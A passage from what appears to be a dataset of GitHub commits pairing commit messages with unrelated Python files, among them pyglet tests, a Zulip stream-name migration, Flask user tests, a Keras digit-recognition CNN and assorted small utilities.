import os
directory = '/home/cwright/Downloads'
filename='Lab6_67p8.chi'
calibration_file = os.path.join(directory, filename)
# step 0 load data
d_spacings = np.loadtxt(calibration_file)
# ns = np.ones(len(d_spacings))
# x = np.linspace(-np.pi, np.pi, 100)
# y = np.sin(x)
# x = np.linspace(-np.pi+1, np.pi, 100)
a = np.loadtxt('/home/cwright/Downloads/Lab6_67p8.chi')
x = a[:, 0]
x = np.hstack((np.zeros(1), x))
print(x.shape)
x = np.hstack((-x[::-1], x))
y = a[:, 1]
y = np.hstack((np.zeros(1), y))
y = np.hstack((y[::-1], y))
x = x[3:]
y = y[3:]
plt.plot(np.linspace(0, 10, x.shape[0]), y)
plt.show()
get_energy_from_std_tth(x, y, [], [], plot=True)
| bsd-2-clause | Python |
|
0136d50265fc390d194436238b88655327982231 | add gobOauth.py | BearlyKoalafied/GGGGobbler | gobOauth.py | gobOauth.py | import praw
import configparser
SAVEFILE = "oauth.ini"
def read_ini():
cfg = configparser.ConfigParser()
cfg.read(SAVEFILE)
return cfg
def get_refreshable_instance():
cfg = read_ini()
reddit = praw.Reddit(client_id=cfg['app']['client_id'],
client_secret=cfg['app']['client_secret'],
refresh_token=cfg['token']['refresh_token'],
user_agent=cfg['app']['user_agent'])
return reddit | mit | Python |
|
e0b84a97e4c7ad5dcef336080657a884cff603fc | Test two windows drawing GL with different contexts. | infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore | tests/gl_test_2.py | tests/gl_test_2.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import pyglet.window
from pyglet.window.event import *
import time
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
class ExitHandler(object):
running = True
def on_close(self):
self.running = False
def on_keypress(self, symbol, modifiers):
if symbol == pyglet.window.key.K_ESCAPE:
self.running = False
return EVENT_UNHANDLED
exit_handler = ExitHandler()
def setup():
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(60., 1., 1., 100.)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
glColor4f(.5, .5, .5, .5)
def draw():
global r
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
r += 1
if r > 360: r = 0
glRotatef(r, 0, 0, 1)
glBegin(GL_QUADS)
glVertex3f(-1., -1., -5.)
glVertex3f(-1., 1., -5.)
glVertex3f(1., 1., -5.)
glVertex3f(1., -1., -5.)
glEnd()
w1 = factory.create(width=200, height=200)
w1.push_handlers(exit_handler)
w1.switch_to()
setup()
c = clock.Clock()
w2 = factory.create(width=400, height=400)
w2.push_handlers(exit_handler)
w2.switch_to()
setup()
r = 0
while exit_handler.running:
c.set_fps(60)
w1.switch_to()
w1.dispatch_events()
draw()
w1.flip()
w2.switch_to()
w2.dispatch_events()
draw()
w2.flip()
| bsd-3-clause | Python |
|
8affb8e4a3744e604b88157a918ef690203cbfa8 | Remove disallowed characters from stream names. | zulip/zulip,andersk/zulip,zulip/zulip,rht/zulip,rht/zulip,andersk/zulip,kou/zulip,zulip/zulip,andersk/zulip,rht/zulip,zulip/zulip,rht/zulip,andersk/zulip,andersk/zulip,zulip/zulip,zulip/zulip,rht/zulip,kou/zulip,kou/zulip,zulip/zulip,kou/zulip,kou/zulip,kou/zulip,andersk/zulip,rht/zulip,rht/zulip,kou/zulip,andersk/zulip | zerver/migrations/0375_invalid_characters_in_stream_names.py | zerver/migrations/0375_invalid_characters_in_stream_names.py | import unicodedata
from django.db import connection, migrations
from django.db.backends.postgresql.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
# There are 66 Unicode non-characters; see
# https://www.unicode.org/faq/private_use.html#nonchar4
unicode_non_chars = set(
chr(x)
for x in list(range(0xFDD0, 0xFDF0)) # FDD0 through FDEF, inclusive
+ list(range(0xFFFE, 0x110000, 0x10000)) # 0xFFFE, 0x1FFFE, ... 0x10FFFE inclusive
+ list(range(0xFFFF, 0x110000, 0x10000)) # 0xFFFF, 0x1FFFF, ... 0x10FFFF inclusive
)
def character_is_printable(character: str) -> bool:
return not (unicodedata.category(character) in ["Cc", "Cs"] or character in unicode_non_chars)
def fix_stream_names(apps: StateApps, schema_editor: DatabaseSchemaEditor) -> None:
Stream = apps.get_model("zerver", "Stream")
Realm = apps.get_model("zerver", "Realm")
total_fixed_count = 0
realm_ids = Realm.objects.values_list("id", flat=True)
if len(realm_ids) == 0:
return
print("")
for realm_id in realm_ids:
print(f"Processing realm {realm_id}")
realm_stream_dicts = Stream.objects.filter(realm_id=realm_id).values("id", "name")
occupied_stream_names = set(stream_dict["name"] for stream_dict in realm_stream_dicts)
for stream_dict in realm_stream_dicts:
stream_name = stream_dict["name"]
fixed_stream_name = "".join(
[
character if character_is_printable(character) else "\N{REPLACEMENT CHARACTER}"
for character in stream_name
]
)
if fixed_stream_name == stream_name:
continue
if fixed_stream_name == "":
fixed_stream_name = "(no name)"
# The process of stripping invalid characters can lead to collisions,
# with the new stream name being the same as the name of another existing stream.
# We append underscore until the name no longer conflicts.
while fixed_stream_name in occupied_stream_names:
fixed_stream_name += "_"
occupied_stream_names.add(fixed_stream_name)
total_fixed_count += 1
with connection.cursor() as cursor:
cursor.execute(
"UPDATE zerver_stream SET name = %s WHERE id = %s",
[fixed_stream_name, stream_dict["id"]],
)
print(f"Fixed {total_fixed_count} stream names")
class Migration(migrations.Migration):
atomic = False
dependencies = [
("zerver", "0374_backfill_user_delete_realmauditlog"),
]
operations = [
migrations.RunPython(fix_stream_names, reverse_code=migrations.RunPython.noop),
]
| apache-2.0 | Python |
|
1deb35d9aa62a6c950cb978063c7f4aed645067b | Add utility module for logging | berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud | mediacloud/mediawords/util/log.py | mediacloud/mediawords/util/log.py | import logging
def create_logger(name):
"""Create and return 'logging' instance."""
formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')
handler = logging.StreamHandler()
handler.setFormatter(formatter)
l = logging.getLogger(name)
l.setLevel(logging.DEBUG)
l.addHandler(handler)
return l
| agpl-3.0 | Python |
|
12c483953f39a3bacaab6d49ba17c4920db52179 | Add script to clean up all FD phone and fax numbers. | FireCARES/firecares,HunterConnelly/firecares,HunterConnelly/firecares,FireCARES/firecares,FireCARES/firecares,FireCARES/firecares,FireCARES/firecares,HunterConnelly/firecares,HunterConnelly/firecares | firecares/firestation/management/commands/cleanup_phonenumbers.py | firecares/firestation/management/commands/cleanup_phonenumbers.py | from django.core.management.base import BaseCommand
from firecares.firestation.models import FireDepartment
from phonenumber_field.modelfields import PhoneNumber
import re
"""
This command is for cleaning up every phone and fax number in the
database. It removes all non-numeric characters, such as parenthesis,
hyphens, spaces, etc. It also removes prefixed 1s These numbers should
be made human-readable on the client side.
"""
def cleanNumber(no1):
no2 = re.sub('[^0-9]','', no1)
if no2.startswith("1"):
no2 = no2[1:]
return no2
class Command(BaseCommand):
def handle(self, *args, **kwargs):
print("Don't worry, it always takes this long.")
for fd in FireDepartment.objects.all():
# If the FD has a phone number, clean it up
if fd.headquarters_phone and not fd.headquarters_phone.raw_input == "Invalid Input":
newPhone = cleanNumber(fd.headquarters_phone.raw_input)
print(newPhone)
fd.headquarters_phone = newPhone
# If the FD has a fax number, clean it up
if fd.headquarters_fax and not fd.headquarters_fax.raw_input == "Invalid Input":
newFax = cleanNumber(fd.headquarters_fax.raw_input)
print(newFax)
fd.headquarters_fax = newFax
# Save and continue to the next FD (if any)
fd.save()
print("Completed successfully!")
| mit | Python |
|
7d128f2386fd3bbcbff1a407018f9ab9ed580810 | Add tests for path join | tesera/pygypsy,tesera/pygypsy | tests/test_path.py | tests/test_path.py | from gypsy.path import _join
def test_join():
assert _join('s3://', 'bucket', 'prefix') == 's3://bucket/prefix'
assert _join('s3://bucket', 'prefix') == 's3://bucket/prefix'
assert _join('bucket', 'prefix') == 'bucket/prefix'
| mit | Python |
|
7589e8c746d264b4e8ebcdcf932ddd9620d419a3 | Implement user tests | Alweezy/cp2-bucketlist-api,Alweezy/cp2-bucketlist-api,Alweezy/cp2-bucketlist-api | tests/test_user.py | tests/test_user.py | import unittest
import json
from app import create_app, db
class UserTest(unittest.TestCase):
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
self.user = {"username": "nerd",
"password": "nerdy",
"email": "[email protected] "
}
def test_registration_successful(self):
"""Test successful user registration."""
response = self.client.post("auth/register",
data=json.dumps(self.user),
content_type="application/json")
result = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result["message"],
'User registration successful.')
self.assertEqual(result['username'],
self.user['username'])
def test_duplicate_user_registration(self):
"""Test registered user registration."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type='application/json')
self.assertEqual(res.status_code, 409)
result = json.loads(res.data)
self.assertEqual(result['message'],
"User with the username already exists.")
def test_login_successful(self):
"""Test successful user login."""
resp = self.client().post('/auth/register/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(resp.status_code, 200)
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 200)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Login successful.")
def test_unauthorised_login_attempt(self):
"""Test unauthorised login attempt."""
res = self.client().post('/auth/login/',
data=json.dumps(self.user),
content_type="application/json")
self.assertEqual(res.status_code, 401)
result = json.loads(res.data)
self.assertEqual(result['message'],
"Invalid username/password.")
def test_incomplete_login_credentials(self):
"""Test partial issue of login credentials"""
res = self.client().post('/auth/login/',
data=json.dumps({"username": "nerd"}),
content_type="application/json")
result = json.loads(res.data)
self.assertEqual(result['error'],
"missing data in request.")
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
if __name__ == '__main__':
unittest.main()
| mit | Python |
|
af2654df47b8b7ea60d78fd7f692e911c2d3a82c | allow oveerride of font used | odyaka341/pyglet,mpasternak/michaldtz-fix-552,Alwnikrotikz/pyglet,cledio66/pyglet,google-code-export/pyglet,cledio66/pyglet,arifgursel/pyglet,Alwnikrotikz/pyglet,kmonsoor/pyglet,qbektrix/pyglet,Alwnikrotikz/pyglet,mpasternak/michaldtz-fixes-518-522,cledio66/pyglet,arifgursel/pyglet,kmonsoor/pyglet,mpasternak/pyglet-fix-issue-552,mpasternak/pyglet-fix-issue-518-522,Austin503/pyglet,kmonsoor/pyglet,odyaka341/pyglet,cledio66/pyglet,Austin503/pyglet,kmonsoor/pyglet,xshotD/pyglet,mpasternak/pyglet-fix-issue-552,google-code-export/pyglet,Austin503/pyglet,mpasternak/michaldtz-fix-552,Alwnikrotikz/pyglet,Alwnikrotikz/pyglet,mpasternak/michaldtz-fixes-518-522,cledio66/pyglet,mpasternak/pyglet-fix-issue-552,mpasternak/pyglet-fix-issue-518-522,qbektrix/pyglet,shaileshgoogler/pyglet,google-code-export/pyglet,arifgursel/pyglet,odyaka341/pyglet,qbektrix/pyglet,shaileshgoogler/pyglet,mpasternak/michaldtz-fixes-518-522,mpasternak/michaldtz-fixes-518-522,odyaka341/pyglet,google-code-export/pyglet,mpasternak/pyglet-fix-issue-518-522,mpasternak/michaldtz-fix-552,xshotD/pyglet,mpasternak/pyglet-fix-issue-518-522,xshotD/pyglet,Austin503/pyglet,kmonsoor/pyglet,gdkar/pyglet,shaileshgoogler/pyglet,gdkar/pyglet,shaileshgoogler/pyglet,qbektrix/pyglet,arifgursel/pyglet,gdkar/pyglet,gdkar/pyglet,arifgursel/pyglet,mpasternak/michaldtz-fix-552,odyaka341/pyglet,Austin503/pyglet,xshotD/pyglet,gdkar/pyglet,qbektrix/pyglet,mpasternak/pyglet-fix-issue-552,shaileshgoogler/pyglet,xshotD/pyglet,google-code-export/pyglet | tests/text_test.py | tests/text_test.py | import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
if len(sys.argv) == 2:
filename = sys.argv[1]
else:
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| import sys
import os
import time
import pyglet.window
from pyglet.window.event import *
from pyglet.GL.VERSION_1_1 import *
from pyglet.GLU.VERSION_1_1 import *
from pyglet import clock
from pyglet.text import Font
from ctypes import *
factory = pyglet.window.WindowFactory()
factory.config._attributes['doublebuffer'] = 1
w1 = factory.create(width=400, height=200)
filename = os.path.join(os.path.split(__file__)[0], 'Vera.ttf')
font = Font.load_font(filename, 72)
text = font.render('Hello World!')
exit_handler = ExitHandler()
w1.push_handlers(exit_handler)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(0, 0, 0, 0)
glColor4f(1, 1, 1, 1)
r = 0
while not exit_handler.exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
#r += 1
if r > 360: r = 0
glTranslatef(w1.width/2, w1.height/2, 0)
glRotatef(r, 0, 0, 1)
glTranslatef(-text.width/2, -text.height/2, 0)
text.draw()
w1.flip()
| bsd-3-clause | Python |
4e5a1a799bea020c145e544de255e3322ecc5aed | add kerasCNN | puyokw/kaggle_digitRecognizer,puyokw/kaggle_digitRecognizer | kerasCNN.py | kerasCNN.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = './'
batch_size = 256
nb_classes = 10
img_rows, img_cols = 28, 28 # input image dimensions
nb_filters = 32 # number of convolutional filters to use
nb_pool = 2 # 2 size of pooling area for max pooling
nb_conv = 3 # 3 convolution kernel size
# the data, shuffled and split between tran and test sets
train = pd.read_csv(path+'train.csv')
labels = train['label']
del train['label']
test = pd.read_csv(path+'test.csv')
train = train.values
train = train.reshape(train.shape[0], 1, img_rows, img_cols)
test = test.values
test = test.reshape(test.shape[0], 1, img_rows, img_cols)
train = train.astype("float32")
test = test.astype("float32")
train /= 255
test /= 255
print('train shape:', train.shape)
print(train.shape[0], 'train samples')
print(test.shape[0], 'test samples')
label = np_utils.to_categorical(labels, nb_classes)
# convert class vectors to binary class matrices
N = train.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=np.array(range(10)))
nfold=5
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((test.shape[0],10))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = train[tr], train[te], label[tr], label[te]
predTr = np.zeros((X_valid.shape[0],10))
n_bag=5
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Convolution2D(nb_filters, nb_conv, nb_conv,
border_mode='full',
input_shape=(1, img_rows, img_cols)))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Activation('relu'))
model.add(Convolution2D(nb_filters, nb_conv, nb_conv))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"weights.hdf5", verbose=0, save_best_only=True)
model.compile(loss='categorical_crossentropy', optimizer='adadelta')
model.fit(X_train, y_train, batch_size=batch_size, nb_epoch=1000, show_accuracy=True,
verbose=2, validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
print(confusion_matrix(labels, submissionTr.idxmax(axis=1)))
pd.DataFrame(pred).to_csv(path+"kerasCNN.csv",index_label='ImageId')
Label=pd.DataFrame(pred).idxmax(axis=1)
submission = pd.DataFrame({'ImageId': np.array(range(test.shape[0]))+1, 'Label': Label})
submission.to_csv(path+"kerasCNN_submission.csv",index=False)
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasCNN_stack.csv",index_label='ImageId')
# nfold 5, bagging 5: 0.020957301 + 0.00140977765 , Public LB: 0.99371
# batch_size 256: 0.0203983009777 + 0.00172547876286, Public LB: 0.99414
| mit | Python |
|
7336cc3c89727383c7a9cbbf564f6cfce7f198f9 | add similiarty3.py | yzvickie/new_insightfl,yzvickie/new_insightfl,yzvickie/new_insightfl | app/find_similarity3.py | app/find_similarity3.py | import sys
import string
import requests
import json
import pymysql
import numpy as np
import pandas as pd
from operator import itemgetter
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.decomposition import PCA, RandomizedPCA, TruncatedSVD
from sklearn.preprocessing import Normalizer
def find_companies(investorname):
investorname = np.int(investorname)
rmatrix= np.loadtxt(open("investorcompanyPCA.csv"),delimiter=",")
investor_id = np.loadtxt(open("investorIDorder.csv"),delimiter=",")
investor_id = investor_id.astype(int)
count=0
score = []
target=[]
for row in investor_id:
if row == investorname:
target = rmatrix[count]
break
count += 1
counter2 = 0
for row in rmatrix:
#score.append([cosine_similarity(target,row).tolist()[0][0], investor_id[counter2]])
score.append({u'similarity': cosine_similarity(target,row).tolist()[0][0], u'investor_id': investor_id[counter2]})
counter2 += 1
#score = sorted(score,reverse=True)
con = pymysql.connect(host='localhost', user='root', passwd='****')
cur = con.cursor()
cur.execute('''USE Venturenetwork16;''')
current_query='''SELECT startupID FROM Investor_comp'''
company_total = pd.io.sql.frame_query(current_query, con)
company_total = list(company_total['startupID'])
similarcomp=[]
current_query='''SELECT * FROM Investor_comp'''
rows = pd.io.sql.frame_query(current_query, con)
df = pd.Series(list(rows['startupID']),list(rows['investor_id']))
score = sorted(score,key=itemgetter('similarity'),reverse=True)
similarcomp = []
for investor_row in score[1:20]:
for company in list(df[investor_row['investor_id']]):
similarcomp.append([company, investor_row['similarity']])
companyid = [ row[0] for row in similarcomp ]
companysim = [ row[1] for row in similarcomp ]
uniquecompID = list(set(companyid))
uniquesimcomp = []
for company in uniquecompID:
compscore = 0
for company2 in similarcomp:
if company == company2[0] and company not in list(df[investorname]):
compscore += company2[1]
uniquesimcomp.append([compscore, company])
return sorted(uniquesimcomp, reverse=True)[0:40], score
if __name__ == "__main__":
[uniquesimcomp,score] = find_companies(sys.argv[1])
print [uniquesimcomp,score]
| mit | Python |
|
08988d19c712ad4604f0acced71a069c7c20067a | Add kv store for file storage | cgwire/zou | zou/app/stores/file_store.py | zou/app/stores/file_store.py | import flask_fs as fs
from zou.app import app
pictures = fs.Storage("pictures", overwrite=True)
movies = fs.Storage("movies", overwrite=True)
pictures.configure(app)
movies.configure(app)
def make_key(prefix, id):
return "%s-%s" % (prefix, id)
def add_picture(prefix, id, path):
key = make_key(prefix, id)
with open(path, 'rb') as fd:
return pictures.write(key, fd)
def get_picture(prefix, id):
key = make_key(prefix, id)
return pictures.read(key)
def open_picture(prefix, id):
key = make_key(prefix, id)
return pictures.open(key, 'rb')
def exists_picture(prefix, id):
key = make_key(prefix, id)
return pictures.exists(key)
def remove_picture(prefix, id):
key = make_key(prefix, id)
pictures.delete(key)
def add_movie(prefix, id, content):
key = make_key(prefix, id)
return movies.write(key, content)
def get_movie(prefix, id):
key = make_key(prefix, id)
return movies.read(key)
def open_movie(prefix, id):
key = make_key(prefix, id)
return movies.open(key, 'rb')
def exists_movie(prefix, id):
key = make_key(prefix, id)
return movies.exists(key)
def remove_movie(prefix, id):
key = make_key(prefix, id)
movies.delete(key)
| agpl-3.0 | Python |
|
56c27d56ca16f6659a478af0b6529291b1140636 | Create find-peak-element-ii.py | kamyu104/LintCode,jaredkoontz/lintcode,jaredkoontz/lintcode,jaredkoontz/lintcode,kamyu104/LintCode,kamyu104/LintCode | Python/find-peak-element-ii.py | Python/find-peak-element-ii.py | # Time: O(max(m, n))
# Space: O(1)
class Solution:
#@param A: An list of list integer
#@return: The index of position is a list of integer, for example [2,2]
def findPeakII(self, A):
upper, down = 0, len(A) - 1
left, right = 0, len(A[0]) - 1
while upper < down and left < right:
height = down - upper + 1
width = right - left + 1
# T(m, n) = T(m / 2, n / 2) + O(m) + O(n / 2) = O(max(m, n))
if width > height: # Vertical split.
mid_j = left + (right - left) / 2
left_max, central_max, right_max = 0, 0, 0
max_i, max_j = -1, -1
for i in xrange(upper+1, down):
if A[i][mid_j] > central_max:
max_i, max_j = i, mid_j
central_max = A[i][mid_j]
left_max = max(left_max, A[i][mid_j - 1])
right_max = max(right_max, A[i][mid_j + 1])
if left_max > central_max and left_max > right_max: # Find left.
right = mid_j
elif right_max > central_max and right_max > left_max: # Find right.
left = mid_j
else: # Find one peak.
return [max_i, max_j]
else: # Horizontal split.
mid_i = upper + (down - upper) / 2
upper_max, central_max, down_max = 0, 0, 0
max_i, max_j = 0, 0
for j in xrange(left + 1, right):
if A[mid_i][j] > central_max:
max_i, max_j = mid_i, j
central_max = A[mid_i][j]
upper_max = max(upper_max, A[mid_i - 1][j])
down_max = max(down_max, A[mid_i + 1][j])
if upper_max > central_max and upper_max > down_max: # Find upper.
down = mid_i
elif down_max > central_max and down_max > upper_max: # Find down.
upper = mid_i
else: # Find one peak.
return [max_i, max_j]
return [-1, -1] # Not found.
| mit | Python |
|
49882e51faa26dbaa17a5f3510f0ba215b317dac | add simple test | mode89/snn,mode89/snn,mode89/snn | test/simple.py | test/simple.py | import matplotlib.pyplot as plt
import numpy
numpy.random.seed(0)
N = 1000
Ne = N * 0.8
Ni = N - Ne
a = numpy.concatenate((
0.02 * numpy.ones((Ne, 1)),
0.1 * numpy.ones((Ni, 1))
))
b = numpy.concatenate((
0.2 * numpy.ones((Ne, 1)),
0.2 * numpy.ones((Ni, 1))
))
c = numpy.concatenate((
-65 * numpy.ones((Ne, 1)),
-65 * numpy.ones((Ni, 1))
))
d = numpy.concatenate((
8 * numpy.ones((Ne, 1)),
2 * numpy.ones((Ni, 1))
))
S = numpy.concatenate((
0.5 * numpy.random.rand(N, Ne),
-1.0 * numpy.random.rand(N, Ni)), axis=1)
v = -65 * numpy.ones((N, 1))
u = numpy.multiply(b, v)
firings = [[], []]
for t in range(1000):
I = 13 * (numpy.random.rand(N, 1) - 0.5)
fired = numpy.argwhere(v >= 30)[:,0]
if fired.size > 0:
for firing in fired:
firings[0].append(t)
firings[1].append(firing)
v[fired] = c[fired]
u[fired] += d[fired]
I += numpy.sum(S[:, fired], 1).reshape((N, 1))
v = v + (0.04 * numpy.square(v) + 5 * v + 140 - u + I)
u = u + numpy.multiply(a, numpy.multiply(b, v) - u)
plt.scatter(
firings[0],
firings[1],
color="black",
marker=".")
plt.show()
| mit | Python |
|
32c5a681c7dd498204d38d5d1152aa7f67e09069 | Add feedback entries to the Admin panel | 19kestier/taiga-back,gauravjns/taiga-back,Zaneh-/bearded-tribble-back,jeffdwyatt/taiga-back,crr0004/taiga-back,CoolCloud/taiga-back,astagi/taiga-back,frt-arch/taiga-back,joshisa/taiga-back,coopsource/taiga-back,rajiteh/taiga-back,astronaut1712/taiga-back,coopsource/taiga-back,astronaut1712/taiga-back,gauravjns/taiga-back,astagi/taiga-back,WALR/taiga-back,taigaio/taiga-back,dayatz/taiga-back,dycodedev/taiga-back,Rademade/taiga-back,EvgeneOskin/taiga-back,obimod/taiga-back,frt-arch/taiga-back,joshisa/taiga-back,EvgeneOskin/taiga-back,Tigerwhit4/taiga-back,dayatz/taiga-back,gam-phon/taiga-back,rajiteh/taiga-back,CMLL/taiga-back,taigaio/taiga-back,crr0004/taiga-back,gam-phon/taiga-back,forging2012/taiga-back,Rademade/taiga-back,seanchen/taiga-back,Zaneh-/bearded-tribble-back,CMLL/taiga-back,frt-arch/taiga-back,gauravjns/taiga-back,obimod/taiga-back,crr0004/taiga-back,CMLL/taiga-back,obimod/taiga-back,astronaut1712/taiga-back,bdang2012/taiga-back-casting,astagi/taiga-back,CoolCloud/taiga-back,taigaio/taiga-back,bdang2012/taiga-back-casting,astagi/taiga-back,WALR/taiga-back,rajiteh/taiga-back,coopsource/taiga-back,jeffdwyatt/taiga-back,CMLL/taiga-back,rajiteh/taiga-back,astronaut1712/taiga-back,dycodedev/taiga-back,Tigerwhit4/taiga-back,CoolCloud/taiga-back,obimod/taiga-back,crr0004/taiga-back,Rademade/taiga-back,Rademade/taiga-back,Rademade/taiga-back,jeffdwyatt/taiga-back,joshisa/taiga-back,WALR/taiga-back,EvgeneOskin/taiga-back,bdang2012/taiga-back-casting,gam-phon/taiga-back,19kestier/taiga-back,forging2012/taiga-back,Zaneh-/bearded-tribble-back,coopsource/taiga-back,EvgeneOskin/taiga-back,joshisa/taiga-back,19kestier/taiga-back,seanchen/taiga-back,jeffdwyatt/taiga-back,WALR/taiga-back,CoolCloud/taiga-back,bdang2012/taiga-back-casting,forging2012/taiga-back,dycodedev/taiga-back,forging2012/taiga-back,dycodedev/taiga-back,xdevelsistemas/taiga-back-community,Tigerwhit4/taiga-back,dayatz/taiga-back,seanchen/taiga-back,Tigerwhit4/taiga-back,xdevelsistemas/taiga-back-community,gauravjns/taiga-back,gam-phon/taiga-back,seanchen/taiga-back,xdevelsistemas/taiga-back-community | taiga/feedback/admin.py | taiga/feedback/admin.py | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib import admin
from . import models
class FeedbackEntryAdmin(admin.ModelAdmin):
list_display = ['created_date', 'full_name', 'email' ]
list_display_links = list_display
list_filter = ['created_date',]
date_hierarchy = "created_date"
ordering = ("-created_date", "id")
search_fields = ("full_name", "email", "id")
admin.site.register(models.FeedbackEntry, FeedbackEntryAdmin)
| agpl-3.0 | Python |
|
f68b1a9d5aa2c36f9301588a55bc217a9ed120c1 | Create PowerofThree_001.py | Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/algo,cc13ny/Allin,Chasego/codi,Chasego/codirit,Chasego/codi,cc13ny/algo,Chasego/codirit,Chasego/codi,cc13ny/Allin,Chasego/codirit,Chasego/cod,Chasego/codirit,Chasego/cod,Chasego/codi,cc13ny/Allin,cc13ny/Allin,cc13ny/algo,Chasego/codirit,Chasego/cod,cc13ny/Allin,Chasego/cod,cc13ny/algo | leetcode/326-Power-of-Three/PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | class Solution(object):
def isPowerOfThree(self, n):
"""
:type n: int
:rtype: bool
"""
return n > 0 and 3 ** round(math.log(n, 3)) == n
| mit | Python |
|
6c00711a5440fe958691c8064227565461e0acdf | add tools for laa analysis | sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana,sequana/sequana | sequana/laa.py | sequana/laa.py | from sequana import BAM
import glob
import pandas as pd
import pylab
class LAA():
